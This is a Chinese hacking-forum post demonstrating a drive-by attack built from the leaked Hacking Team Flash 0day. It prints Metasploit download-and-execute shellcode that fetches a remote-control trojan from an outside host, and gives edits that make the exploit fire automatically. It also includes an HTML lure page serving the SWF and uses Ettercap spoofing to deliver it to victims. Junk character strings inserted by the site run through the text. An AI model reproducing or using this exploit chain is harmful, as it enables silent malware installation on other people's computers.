中国网络渗透测试联盟

标题: flash 0day之手工代码修改制作下载者实例入侵演示 [打印本页]
作者: admin    时间: 2018-10-20 20:28
标题: flash 0day之手工代码修改制作下载者实例入侵演示

+ M% A+ S/ s( P. Z& i 三、flash 0day之手工代码修改制作下载者实例入侵演示 8 `+ R9 n4 `$ T6 {6 V* s

: k( q" W# K5 b( s3 ]& J1 p

# P, V4 x6 O) k0 J, ^ 利用到的工具: ( P& ~4 D+ v3 s f- |' `7 \

% T" l4 D: t+ U8 R' c$ ~6 J

/ K( v' c: ?& A; k9 B: Y Msf 1 [7 R( Z6 o: W/ ~' ^- l, e6 T

6 V7 ~- l- S" ^1 P1 o

- z" n$ V4 f# l+ t Ettercap 9 @7 r. q. ^9 l; p& v- c2 p

. M/ k- f, [( e0 X; }

- P7 e/ a1 ^6 d. a+ ]- f Adobe Flash CS6 0 C! e( A$ h3 _3 K% o9 e

( L) p, t# W% S5 x, C

5 U5 M2 a, {6 U D+ k# l$ ?2 P9 ` Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 ! R+ a7 r4 o- X: p6 X; D- [1 r

( _7 p' Z6 l3 R6 p9 O! u% }9 i

3 z. I* D/ l) T$ H' e _ 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options # B! [* }) L% g$ m% e- P5 P. C

# Q& e9 D& J1 @/ b: Z6 z, w4 f) n2 Y6 l

" A% S. T5 K, n8 e% C* e 如图: , V( [" t2 n B k, W. ]

+ E, a% }( y T& s5 V

( G6 b3 R# F1 Q+ F+ F( t   0 ?; o f8 J3 w9 Y9 M

9 Z1 O6 k& I- ~4 A9 B2 T9 L# W

1 F# M' ~# @# v4 q# H   / S# D' \! P1 Q' ~( G

6 Z& n6 e B- H: U# |' c

, z) x) q6 F: {) {) S( B8 A7 [ 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: 8 r% d o! F; x3 F

. Z: \; m9 |5 l0 {, ~: L

- ^! Z+ X6 A" Y3 w$ C. ?* @0 F' ~   8 R5 `/ ^6 T; n- W0 I; w

) D& ~9 g% d# s' J( ^: p$ Z

, ^; F3 X( D4 V: [1 s- D   4 \; `4 j1 {) I6 V# Z

& x5 t: T5 L! D8 D* U

2 Z. ?& z6 V; ?* \3 D 然后执行generate -t dword生成shellcode,如下: . _& l- D) T" s1 e" M `) [2 i

9 Q8 h9 T5 p. H: F& M M% z: I" Z

( T: R3 P2 T1 G/ p. ] j$ b   . c- C" S1 K! K5 v6 b

6 D( b. l/ v( ^% h2 {

4 {$ c; Z& y; w9 H9 \1 V 复制代码到文本下便于我们一会编辑flash exp,如下: ) `) Q# ?1 X+ s. b# n6 @: t

6 O+ Z) J; R! [

) B9 g% S5 g, X8 a$ w 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, ' K1 t4 \1 ^% g3 b

0 Q8 L5 g/ j/ k# j3 @5 t/ N3 ]4 S

/ T& M& K0 C. H% q4 ] 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, / E3 |& [( k1 D$ m6 d2 \

9 p# M( V% h X

8 R ~& [, T. n# ~( Z# _+ s 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, ) q/ E- J% u, k. N% t) ]& o

9 b* j: w+ c, x8 l! K6 D

r" O9 X" W9 k1 } 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 1 L/ [% T' k* ?1 Q0 S5 f

- V4 q' G, M! F. H

, q1 w' F/ ^$ t2 N 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, T" l2 M- I% D2 C8 p# q! [/ H+ N

! j! k1 ~- B' z0 p9 V! Q! o

/ G# G; T, v% S5 E4 I- a7 o4 K 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, . y) Z: I6 `5 ^% y" a0 Y+ I

, p3 }9 N# M v) ]! L

7 j2 o, r9 H# o 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, ! e' S" W$ p" Z& j4 k% F

8 H2 E; _6 @% s3 \: L

1 x9 y2 Z* b4 u. e2 c 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, k% a1 E) z4 [# y. [" ~$ ?& t

$ j" J2 L( d6 | ~, b6 |. b; E1 v6 Z

2 J% y* Q/ u2 J( |, q 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, - K# y6 ^+ v- Y, M6 z

/ G# M) P, o0 s& u- t ^6 g

, C1 ^: Q2 c! L; h8 { 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, + R% i! `, [! I% g i

" f, f& ?( m8 j7 f2 t

& q4 n# @+ g# x/ U P5 O 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, 1 C- G. d( ]% r' M @* S

, ], b/ q! k" ?% n' J0 B; V% h. f/ U

5 ~' n$ p5 u( {* }: H8 E2 Z 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, d, [) a( C" K5 e+ \5 H. ^

0 r( `8 C* H# l! p4 I; c- M( _ E

4 z/ r8 L% `; h! Z8 G9 [. R/ J 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, # Y5 c- k P0 R$ @. Y1 e& ~

% w5 J# p! i- W- c* G

/ G8 j+ U( @" N1 L# Z3 Y 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 Z" T: l" \. i. K) j

4 ?8 g9 q# G6 {1 I: o2 e# ^0 q3 n

$ u. l' h% ~( n# C   ; H' y" |0 Z. }6 E- a5 u* ]

4 q) q8 q) X! V8 r- t8 S. F

i3 m( f; V3 I& l8 s; c: ~1 |   & R, t9 G( J2 f% f1 Q8 C

^ X1 t9 {4 I- e/ `

: \' t/ A% ]: U$ Q0 R 下面我们来修改flash 0day exp,需要修改三个文件,分别为: % e$ g$ w7 t" m* t4 n3 x9 O

. S7 ? M7 u- ~( E5 [4 h0 W

8 j' t1 U' C/ r% S# C; v   ! l' E( t) D0 K4 l1 z- x: S Q

! h: e3 z8 ]/ T

5 L7 ?5 S" Q6 m' s( ^3 Y: j' V 先修改ShellWin32.as,部分源代码如图: 5 ]( |$ J5 z, r' m$ R

m1 n% M) ~. w2 c9 ]

+ M) Z1 b2 N) v1 D* b! Q$ N3 g   ; f$ N, d5 P" ~ Z& ^

( h+ Q7 F/ X3 I9 D6 M2 t* j

. i1 j' f5 ^) \4 n 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: ' Q( u; X# x' c# Z

1 W: c( @/ I" l3 i) f4 J

, I& K! J& l: S. m   % u8 I8 b! M, }3 k" v2 k" ~7 n/ h

% k6 z7 \0 H4 V d: x# J

: u! t! B' k7 ^( }) k 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: m$ l$ J( ?; }

: F' ]6 K( j3 ]3 ~" Z- @

( z0 u2 _* ^9 ~. w0 Y   ) X( j; g; O; p8 B$ i3 c" W! c: \

+ ^$ Y' x2 N$ w Y) m

' h) g5 g+ v" D0 l7 ]. P6 y 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: ( t( s. M6 H/ O

' V: _2 n2 ]* ?2 f

4 g% q0 L% p9 j0 }2 `9 A4 s   4 z' z1 s3 H5 f* n3 `

P6 _, ~6 L, y, `( M

0 S, f; L- b+ V: r   3 p, M* e m% o- {8 L2 w" J

0 T1 V' P5 d" D% j0 n7 C. G

, S {" r4 g5 v2 j   1 |. O0 M, s7 Y5 |6 h! ?( S

: S- I# {8 O) F# B1 g: L5 x

* z9 ?9 x5 k; F/ E, a4 ` 然后点保存,下面我们来编译一下,打开 5 n; _# ]2 y& @& g, k: a+ Q

* [+ `. V! d7 J5 U% R, V: }0 e! L

+ Y! m, k$ [2 H& I: P) M exp1.fla然后点文件-发布,看看编译没错误 ( H- _+ k; G& b8 \

4 ?. L1 k+ f* d! K; w

0 b, f( X3 @; v) P   % [$ l" A. Q1 z9 l3 q0 X' w: A7 L

5 {+ s2 ?* X4 J5 }

7 w9 F, e! M- p8 f( z1 v+ Y, O) M6 r   / E" e" d+ Y, {" R3 V" k

+ Q i/ ?% H9 s& y' t0 P# a/ A

2 c4 `/ m! e' b% J- P8 b9 R   ' c, {- d7 b. W

/ V, r' J. H" q# y9 J- [

6 \# Y. ~. }; v9 K1 h   R& f% b9 d8 }: s& _6 J0 @" K

1 u1 q4 S4 O y6 @' }

, k' w- ]& X# z) [3 z 然后我们把生成的 0 R# l6 @0 w- R' w0 h# S

4 W/ ?7 z" g: S. }+ f3 U

; j. \4 ], e# M$ M5 D9 Y/ G exp1.swf丢到kailinux /var/www/html下: # Q% w; {( @) B

) B3 U, D! o' y& R" W

( Q* V) x3 I4 t 然后把这段代码好好编辑一下 3 ^, Y9 O/ q, @! ]' P

2 ]5 T, J' L: f# a6 u

% M+ O% e, z8 L6 G( u   5 f0 ?4 @0 x- M f! v' L$ ~" L

r) I/ R# \! X' X

) z4 J8 a, }6 W* q* E   # a% n9 o* D3 |5 q( m( I

Y9 @7 | s9 ?1 u- @, c

" X4 f' z4 e$ X# e   + t- S- K5 M* V7 G! k% @6 N

( _6 u# t/ I' r/ {' ~0 X7 s4 A1 p1 Z

; z$ p* R. W( z8 _5 Z) B4 y b" ]   . P7 D6 A( R* }! Q. K

: O* n- P8 }( E x/ @+ L+ i

% _# l; g/ @8 T$ C- L7 B   4 z! f9 G, } n# ]& _

* Q) g/ E4 `% [' d ^. F' |

, O" z1 m/ |/ e6 u6 m+ ~   9 B, _7 {9 H1 g! u2 M

6 _1 r0 L- `+ R2 e0 l

$ |3 Q' F4 [) F! @0 s4 T# I+ b <!DOCTYPE html> / o+ R7 s. `* V( r9 S

9 n% g. w+ }9 Y7 D) b3 Y, N* I

: J7 s# X. O9 X, C% q. N9 l <html> - _3 [% x5 M2 M

' d: h5 ?, e0 T: X

+ B* K& d/ q. x3 B' x <head> " }: B8 y5 j: C* ^- D5 c

3 R7 K' {/ {5 r c! W

% d7 b, Q- f" D- K: F! y" c <meta http-equiv="Content-Type" content="text/html; [* z! q- h9 n1 L( V0 d$ E. Q0 K

& h6 _3 S6 m' |$ C3 K; p; ]* W' R

) b8 I# s) b5 Z& A2 O charset=utf-8"/> 6 {9 A( v' X; `5 k; H, I

2 F5 ~) @ R4 \% B+ |( h

( U" I4 G# T; X5 g </head> 7 e+ s% C$ ^8 O' z; |( L

- v G1 u4 X; T# ~+ E, F

7 [5 F7 ~ n: G. Y <body> # f9 w, l) H& w/ Y y8 `8 J! M

* E5 f- y5 u! u+ s" A4 D: R1 h

* S0 ?! F% {2 |8 W/ a <h2> Please wait, the requested page is loading...</h2> , H8 u) h) n) k: w% ?

) t0 n. Q, b3 A! M# j: B5 ~- v

0 ~) }( s9 c8 r, Q; D7 Z, _ <br> , M/ @6 q' }) i# G# E4 ?! F

2 a4 d2 A5 [% r( X0 E: w& W* i

. L/ S% K6 R" N) S& @; C k <OBJECT & a' g( j0 Q' S6 d% d. L& j* X

* p1 B% |2 L. G8 C+ P

8 K* E, I' v6 e& B! G8 \& M$ Y classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie # A* X( [8 @1 V$ F0 B# ]

& Y! q6 _9 m; j2 l

5 z. A" w$ J: [7 B' ?; ]8 C VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 9 R# P9 G- r! a' p3 ?

3 m$ ?& U! ~* x! S& A

|+ C7 O0 [! a( J </body> 2 R' b4 t8 X/ S" y; v0 }, f" c9 I

4 U' K: l# ^& F8 {. O$ i

/ h# @4 y# z, ]3 n* n3 t& z <script> " r7 S( o: {" t" {$ N, T* m6 |1 M7 `

- y: |- m. x5 E$ n2 c6 O5 m

1 K, J s$ }* M/ F     setTimeout(function () { * K ~# \3 B% n7 [ a. r

9 O5 G8 P; Y- i" Z2 Y- J K

% P0 T. h' H2 y( [7 D2 |          ( e% P: T" p- ^; m

1 Z7 t" J& K4 p% } D* ~! @$ S

7 F6 n, ]5 R- ?4 e window.location.reload(); 5 y* {1 {( n* Z- W+ ~/ m$ c9 J! s

4 o* H3 n" u, Y) r) y: W

1 Z0 W1 P4 p) @# J, }     }, 10000); 5 a- _- ^2 i, v9 {" ^, @

" d5 F6 a# ~: Y6 h

5 Y& z# m( b! V5 z   1 @" ^: j( B! }& |

5 B' k* J+ {5 J4 C+ O$ I! s$ f q

: M! x3 G& z5 d( N </script> & T& G: |% V. O3 _8 o+ ?

7 _/ K. o2 h1 _( B; N) h: ~3 b- q

' m0 j+ T6 x2 ~: J: y </html> + T5 J8 _6 o6 N. `6 o

7 }' I5 T" L' z

+ k5 @/ n1 y8 }7 Q8 u3 V1 W9 r1 i" ?; H   9 J0 @9 b t5 z; F( ~- t, ~! o- s

- U0 b, f" ?, G8 x

0 x9 I- v9 V/ T! S& f 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: / V* B0 u0 m* m/ y) M( I( X

! p, U( I9 ^, r) y+ n

8 p1 y0 V! w7 D8 B   # D* _, S/ ?# H; \: L* r( m

( \8 `" F( ?0 I5 S* X

( n. D2 Y2 a6 j+ D   % `' t" s+ l, q( B) X; X8 _

; [$ m/ m+ n* d: n' T

" k4 d# U# M8 |3 Q# Y2 J   ! _' ]7 ?$ [0 ]5 K! S' D4 X, y& A

0 x1 U( x# ]% w3 O) F: ~' G6 `

/ R7 c( W) B/ [: e   . x7 E! ~6 ~2 J5 l1 z. l+ f' E

- p5 k. }2 R0 @+ X9 B8 h

2 l, j" h5 i3 P* q, A3 z   % P# C: [: `/ a! P! H+ u7 }% d$ |# E- V

0 @# ~% ?0 }7 C

$ [. S% D [6 m$ _ 下面我们用ettercap欺骗如图: # _+ h7 z1 H& n$ c5 d

# S# d* z# u* M M" Y

$ D( |: P- `8 Y( o$ \/ t \2 u# s   % P* s% K- o9 V& |

% h8 s& H; ~( y$ A: Q: @

# B8 d& t4 O) j3 _   ) T4 o4 U# ^( y

1 s/ E2 Y* y/ F, t8 E' M( J

: h& c5 H+ w% H, w0 N 下面我们随便访问个网站看看: : U. F- T$ d: b$ i u7 _

6 t" v: r+ ]2 B4 [7 ^, C4 r

: W( U1 ]' a2 `6 G) V 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 2 Q7 k) s. x$ F7 J. F

: Q( S+ n( S0 ?! I; c/ h% @. T

" O0 \( @0 W, @/ Z. f   ; @7 \& B# N: h a- c7 V. [

5 `1 ]- d% \/ j: m

# k9 H: Q3 p1 {# U% X 我们看另一台, 8 b$ ?5 S8 b3 S8 d

& Z; T( \& a2 z+ K

$ _: W! l$ z; ?; A* `, g/ D 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 ; c/ r9 G! Y' b6 Y _





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2